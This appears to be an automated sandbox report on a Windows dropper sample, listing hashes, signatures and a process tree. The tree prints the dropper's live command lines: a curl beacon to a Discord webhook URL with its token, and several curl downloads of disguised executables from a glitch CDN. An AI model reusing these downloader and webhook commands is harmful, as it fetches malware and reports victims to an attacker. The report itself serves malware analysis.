Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 22-06-2024 08:16
Static task static1: 1 signatures
Behavioral task behavioral1: sample Dropper.exe, resource win7-20240221-en, 2 signatures, 150 seconds
Behavioral task behavioral2: sample Dropper.exe, resource win10v2004-20240611-en, 27 signatures, 150 seconds
General
Target: Dropper.exe
Size: 12KB
MD5: 13eb5be5584766a9f95d058b74c01fae
SHA1: 859b917932b9ce6610a5eb90c315cfd4f728f200
SHA256: 58d82fcd47e89b187c3d6aa5ab70d5ea876968d223490ac1b3b24e4c71715292
SHA512: ea1fc5c2c8b0194863b8bf68a4d432b269ac666bcd6d8dd65b1e2d5e4e1926ccc9b013e42f39f100b99ba106253d85c33d1ac6ec89d51f8023b73444fa3a5a6e
SSDEEP: 384:pHPELyODmB7q9bJnz6PbQGw+pfolHfhhDd4VCsw:1EmO6s9bJMbK/hhDawsw
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (24 IoCs)
Processes:
description                          pid   process      target process
PID 1312 wrote to memory of 2640     1312  Dropper.exe  Dropper.exe
PID 1312 wrote to memory of 2640     1312  Dropper.exe  Dropper.exe
PID 1312 wrote to memory of 2640     1312  Dropper.exe  Dropper.exe
PID 1312 wrote to memory of 2640     1312  Dropper.exe  Dropper.exe
PID 2640 wrote to memory of 2592     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2592     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2592     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2592     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2664     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2664     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2664     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2664     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2792     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2792     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2792     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2792     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2556     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2556     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2556     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2556     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2720     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2720     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2720     2640  Dropper.exe  cmd.exe
PID 2640 wrote to memory of 2720     2640  Dropper.exe  cmd.exe
Processes (tree, depth in brackets)

[1] C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    Signature: Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
      Signature: Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
memory/1312-0-0x000000007436E000-0x000000007436F000-memory.dmp  Filesize 4KB
memory/1312-1-0x0000000001070000-0x000000000107A000-memory.dmp  Filesize 40KB
memory/2640-2-0x00000000742E0000-0x00000000749CE000-memory.dmp  Filesize 6.9MB
memory/2640-3-0x00000000742E0000-0x00000000749CE000-memory.dmp  Filesize 6.9MB